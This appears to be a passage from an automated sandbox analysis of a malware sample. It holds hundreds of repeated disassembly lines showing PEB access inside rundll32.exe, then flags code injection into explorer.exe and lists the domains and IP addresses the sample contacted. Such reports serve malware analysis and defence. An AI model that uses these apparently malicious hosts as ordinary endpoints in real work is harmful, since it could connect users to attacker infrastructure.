          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04964120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04967D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04983D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04988EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04945210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04963A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04978E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04958A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A01608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0498927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04958794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A15BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A0138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A0131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0494DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A18B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 202.210.8.86 80
          Source: C:\Windows\explorer.exeDomain query: www.omfgphil.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.252.96.189 80
          Source: C:\Windows\explorer.exeDomain query: www.tracisolomon.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 34.95.69.141 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.rogegalmish.com
          Source: C:\Windows\explorer.exeDomain query: www.webdomoupravitel.com
          Source: C:\Windows\explorer.exeDomain query: www.drisu-goalkeeping.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.232.222.43 80
          Source: C:\Windows\explorer.exeDomain query: www.shirleyeluiz.com
          Source: C:\Windows\explorer.exeDomain query: www.thepocket-onlinelesson.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 64.98.145.30 80
          Source: C:\Windows\explorer.exeDomain query: www.4520oceanviewavenue.com
          Source: C:\Windows\explorer.exeDomain query: www.skynetaccess.com
